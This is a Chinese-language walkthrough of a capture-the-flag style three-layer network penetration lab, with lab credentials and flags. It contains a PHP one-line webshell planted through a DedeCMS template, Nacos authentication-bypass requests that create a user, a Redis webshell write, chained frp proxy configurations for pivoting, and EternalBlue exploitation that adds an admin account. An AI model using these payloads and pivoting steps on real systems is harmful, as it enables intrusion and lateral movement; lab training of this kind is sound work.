靶场搭建

具体搭建直接看官方的视频就行

三层网络渗透及综合渗透教程-环境搭建_哔哩哔哩_bilibili

环境配置

环境及所需工具下载地址:https://pan.quark.cn/s/9d68fc9eea63

动态更新环境地址:https://pan.quark.cn/s/a096cebb578e

  • 网盘可能由于波动,导致环境丢失,会在此地址动态更新下载链接

DMZ服务器账号密码:administrator/P@ssw0rd1

二层服务器账号密码:dmz/P@ssw0rd2

三层服务器账号密码:pro/P@ssw0rd3

以上信息在视频和描述中已说明请确保安装盘硬盘容量大于15G

任务要求

拿下DMZ区设备后获取DMZ区administrator桌面下flag文件值

拿下二层网络设备获取某服务内的flag

拿下二层网络设备后获取根目录下flag文件值

拿下三层网络设备后获取pro用户桌面下的flag文件值

改动

VMnet2和VMnet3还是按作者的来设置(我这里看错了所以和州弟的不一样,其实改成什么都行),把作者的VMnet4网卡换成我个人的VMnet8网卡,因为我不想改我kali的IP了

主机 IP 网卡一 网卡二
kali 192.168.213.128 VMnet8 192.168.213.0/24
DMZ
Windows
192.168.213.129
192.168.59.128
VMnet8 192.168.213.0/24 VMnet3 192.168.59.0/24
二层
Linux
192.168.59.129
192.168.37.128
VMnet3 192.168.59.0/24 VMnet2 192.168.37.0/24
三层 Windows 192.168.37.129 VMnet2 192.168.37.0/24

靶场实战

DMZ

Web渗透

主机发现

1
192.168.213.129

fscan扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
192.168.213.1:7680 open
192.168.213.129:21 open
192.168.213.1:7000 open
192.168.213.1:135 open
192.168.213.1:7890 open
192.168.213.1:7070 open
192.168.213.1:139 open
192.168.213.1:445 open
192.168.213.129:135 open
192.168.213.128:22 open
192.168.213.129:139 open
192.168.213.129:445 open
192.168.213.129:3306 open
192.168.213.129:8080 open
[*] WebTitle:http://192.168.213.1:7890 code:400 len:0 title:None
[*] 192.168.213.129 WORKGROUP\WIN-J4JT903TUH1
[+] NetInfo:
[*]192.168.213.129
[->]WIN-J4JT903TUH1
[->]192.168.59.128
[->]192.168.213.129
[*] WebTitle:http://192.168.213.129:8080 code:200 len:14405 title:我的网站
[+] InfoScan:http://192.168.213.129:8080 [CMS]
[+] http://192.168.213.129:8080 poc-yaml-dedecms-cve-2018-6910
[+] http://192.168.213.129:8080 poc-yaml-CVE-2022-22965-spring4shell-RCE
[+] SSH:192.168.213.128:22:root root

1
2
include/downmix.inc.php
inc/inc_archives_functions.php

目录扫描

GetShell

账号密码登录 admin/admin

模板—–>默认模板管理—–>新建模板

在内容中输入后门代码

1
<?php @eval($_POST[123]);?>

生成—–>更新主页HTML—–>浏览

选择新建的模板

后缀改为php

选择生成静态

点击更新主页HTML

点击浏览

没有报错

所以后门地址为:

http://192.168.213.129:8080/newtpl.php

使用后门工具进行连接,这里我实际上传的是哥斯拉,文本写的是一句话木马,大家分辨清楚哈

拿到flag_1

第一个任务是拿下DMZ区设备后获取DMZ区administrator桌面下flag文件值

1
flag{78477a738c06620b872421af357d2cd5}

后渗透

信息收集

发现不存在域环境,且存在双网卡,不出网

1
2
3
192.168.213.129/24

192.168.59.128/24

fscan扫描

扫一扫第二个网段

1
fscan.exe -h 192.168.59.128/24

显示存在认证绕过,待会儿看看。还有6379端口开放了,说不定存在redis未授权哈,还有22端口,看来这台主机是Linux了

上线CS

为方便针对第二天靶机,上线CS

成功上线

代理隧道

成功访问到

http://192.168.59.129:8848/nacos/#/login

kali挂代理

成功访问到

二层

Web渗透

1、在url处添加访问一下网址即可查看到用户列表

1
/nacos/v1/auth/users?pageNo=1&pageSize=100

2、访问以下链接并使用burp抓包,然后把get请求改为post,把修改User-Agent头改为Nacos-Server

1
http://192.168.59.129:8848/nacos/v1/auth/users

发现缺少参数

3、构造数据包添加一个demo用户,然后发送POST请求,返回为200,表示创建用户成功

1
username=demo&password=demo

4、回到登录界面,使用添加的账号密码进行登录,可以看到登录成功

拿到flag_2

1
flag{7b4b73d7e9ef1c5959efbb820de2495e}

还有一个password,不知道是ssh密码还是redis的密码,

redis写入webshell

尝试登录

寻找web目录

80端口进行目录扫描

挂一层代理连接蚁剑

拿到flag_3

在根目录下 /flag

1
flag{you_look_look}

后渗透

信息收集

发现不存在域环境,且存在双网卡,不出网

1
2
3
192.168.59.129/24

192.168.37.128/24

fscan扫描

1
fscan -h 192.168.37.128/24

现在的代理是第一层的代理,流量可达第二层,拿下第二层的主机后可查看第三层的网络信息

因为第一层的代理访问不到第三层的主机,所以现在就准备第二层代理,这样流量就可达第三层,拿下第三层主机

在DMZ主机上传frpc

配置文件

1
2
3
4
5
6
7
8
9
[common]
server_addr = 192.168.213.128
server_port = 7000

[socks5_forward]
type = tcp
local_ip = 192.168.213.129
local_port = 6000
remote_port = 4455

执行

1
frpc.exe -c froc.toml

这样就将和kali做好了代理,代理端口是4455,而这个local_ip和local_port是怎么回事儿呢吧,就是将本地的6000端口转发到一层代理的4455端口上,而这个6000端口将是下文要做的二层代理端口,且这个local_ip呢是和二层主机有共同C段的IP

在DMZ主机上传frps

DMZ主机是windows,上传frps.exe

配置文件

1
bindPort = 7000
1
frps.exe -c frps.toml

启动之后可以看到DMZ主机已经在监听7000端口了

在二层主机上传frpc

二层主机是Linux,上传frpc

配置文件

server_addr填二层主机能访问到DMZ主机的IP,也就是他俩共同网段的192.168.59.0/24的IP

remotePort改为DMZ主机要代理的端口6000,就是上文提到的

1
2
3
4
5
6
7
8
[common]
server_addr = 192.168.59.128
server_port = 7000

[socks5]
type = tcp
remote_port = 6000
plugin = socks5

赋予执行权限,执行

1
frpc -c frpc.toml

启动之后可以上帝视角看到DMZ主机的7000端口已经和二层主机连接上了,同时6000端口也开始监听了

上帝视角看第二层主机也是一样的,已经和DMZ主机建立了连接

现在已经做好了代理,配置一下kali的全局代理,只要第一层的代理端口就行,因为我们再一层和二层直接已经做了端口转发了,现在已经能以第二层主机的身份和第三层主机进行交互了

三层

Web渗透

当前已经知道第三层主机存在永恒之蓝漏洞了,现在看能不能将kali的msf挂上代理,直接拿exp去打第三层主机,很遗憾我的msf一直报超时

不然可以试着用下边几个模块打一打

后渗透

本地挂上代理

用Proxifier挂好第一层代理

规则就把二层和三层的C段写进去

然后用ABC_123的工具来打,扫出来了永恒之蓝

可以看到该工具的流量是从代理里边走的

选择永恒之蓝

注入dll文件

会注入一个新的用户名admin01

密码是:Config123!@#

可以用上帝视角看一下是否注入成功

远程连接三层靶机

拿到flag_4

来到pro用户的桌面

参考文章

【漏洞复现-dedecms-文件上传】vulfocus/dedecms-cve_2019_8933_dedecms 漏洞-CSDN博客

Alibaba Nacos权限认证绕过漏洞复现 - FreeBuf网络安全行业门户